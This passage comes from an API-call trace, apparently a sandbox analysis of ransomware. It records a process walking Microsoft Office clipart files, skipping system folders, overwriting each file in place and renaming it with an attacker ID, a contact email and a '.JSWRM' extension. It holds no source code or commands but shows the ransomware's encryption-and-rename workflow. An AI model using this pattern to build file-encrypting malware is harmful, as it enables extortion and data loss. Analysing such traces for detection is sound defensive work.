lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0088.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0088.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0088.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0088.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0088.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0088.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0088.730] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282928.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0282928.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282928.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0282928.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0088.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0088.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0088.731] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf34834b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf34834b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf36e46d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3700, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0282932.WMF", cAlternateFileName="")) returned 1 [0088.731] lstrcmpiW (lpString1="J0282932.WMF", lpString2=".") returned 1 [0088.731] lstrcmpiW (lpString1="J0282932.WMF", lpString2="..") returned 1 [0088.731] lstrcmpiW (lpString1="J0282932.WMF", lpString2="...") returned 1 [0088.731] lstrcmpiW (lpString1="J0282932.WMF", lpString2="windows") returned -1 [0088.732] lstrcmpiW (lpString1="J0282932.WMF", lpString2="recovery") returned -1 [0088.732] lstrcmpiW (lpString1="J0282932.WMF", lpString2="perflogs") returned -1 [0088.732] lstrcmpiW (lpString1="J0282932.WMF", lpString2="documents and settings") returned 1 [0088.732] lstrcmpiW (lpString1="J0282932.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.732] lstrcmpiW (lpString1="J0282932.WMF", lpString2="system volume information") returned -1 [0088.732] lstrcmpiW (lpString1="J0282932.WMF", lpString2="msocache") returned -1 [0088.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0088.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0282932.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0282932.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0282932.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0088.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0088.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0282932.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0282932.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0282932.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0088.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0088.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0088.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0088.732] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282932.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0282932.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.732] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14080) returned 1 [0088.733] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3700) returned 0x24d210 [0088.733] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3700, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3700, lpOverlapped=0x0) returned 1 [0088.736] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.736] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3700, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3700, lpOverlapped=0x0) returned 1 [0088.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.736] CloseHandle (hObject=0x314) returned 1 [0088.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0088.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0088.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0088.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0088.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0088.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0088.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.737] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282932.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0282932.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282932.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0282932.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0088.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0088.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0088.738] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3946e4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3946e4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3946e4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x388a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0285462.WMF", cAlternateFileName="")) returned 1 [0088.738] lstrcmpiW (lpString1="J0285462.WMF", lpString2=".") returned 1 [0088.738] lstrcmpiW (lpString1="J0285462.WMF", lpString2="..") returned 1 [0088.738] lstrcmpiW (lpString1="J0285462.WMF", lpString2="...") returned 1 [0088.738] lstrcmpiW (lpString1="J0285462.WMF", lpString2="windows") returned -1 [0088.738] lstrcmpiW (lpString1="J0285462.WMF", lpString2="recovery") returned -1 [0088.738] lstrcmpiW (lpString1="J0285462.WMF", lpString2="perflogs") returned -1 [0088.738] lstrcmpiW (lpString1="J0285462.WMF", lpString2="documents and settings") returned 1 [0088.738] lstrcmpiW (lpString1="J0285462.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.738] lstrcmpiW (lpString1="J0285462.WMF", lpString2="system volume information") returned -1 [0088.738] lstrcmpiW (lpString1="J0285462.WMF", lpString2="msocache") returned -1 [0088.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0088.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285462.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285462.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0285462.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0088.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0088.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285462.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285462.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0285462.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0088.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0088.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0088.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0088.738] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285462.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285462.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.739] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14474) returned 1 [0088.740] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3880) returned 0x24d210 [0088.740] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3880, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3880, lpOverlapped=0x0) returned 1 [0088.742] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.742] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3880, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3880, lpOverlapped=0x0) returned 1 [0088.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.742] CloseHandle (hObject=0x314) returned 1 [0088.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0088.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0088.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0088.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0088.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0088.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0088.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.743] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285462.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285462.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285462.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285462.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0088.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0088.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0088.744] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3946e4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3946e4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3946e4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2440, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0285484.WMF", cAlternateFileName="")) returned 1 [0088.744] lstrcmpiW (lpString1="J0285484.WMF", lpString2=".") returned 1 [0088.744] lstrcmpiW (lpString1="J0285484.WMF", lpString2="..") returned 1 [0088.744] lstrcmpiW (lpString1="J0285484.WMF", lpString2="...") returned 1 [0088.744] lstrcmpiW (lpString1="J0285484.WMF", lpString2="windows") returned -1 [0088.744] lstrcmpiW (lpString1="J0285484.WMF", lpString2="recovery") returned -1 [0088.744] lstrcmpiW (lpString1="J0285484.WMF", lpString2="perflogs") returned -1 [0088.744] lstrcmpiW (lpString1="J0285484.WMF", lpString2="documents and settings") returned 1 [0088.744] lstrcmpiW (lpString1="J0285484.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.744] lstrcmpiW (lpString1="J0285484.WMF", lpString2="system volume information") returned -1 [0088.744] lstrcmpiW (lpString1="J0285484.WMF", lpString2="msocache") returned -1 [0088.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0088.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285484.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285484.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0285484.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0088.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0088.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285484.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0285484.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0285484.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0088.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0088.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0088.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0088.744] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285484.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285484.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.745] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9280) returned 1 [0088.745] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2440) returned 0x24d210 [0088.745] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2440, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2440, lpOverlapped=0x0) returned 1 [0088.748] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.748] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2440, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2440, lpOverlapped=0x0) returned 1 [0088.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.749] CloseHandle (hObject=0x314) returned 1 [0088.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0088.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0088.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0088.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0088.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0088.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0088.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0088.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0088.749] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285484.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285484.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285484.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285484.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0088.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0088.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0088.750] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: 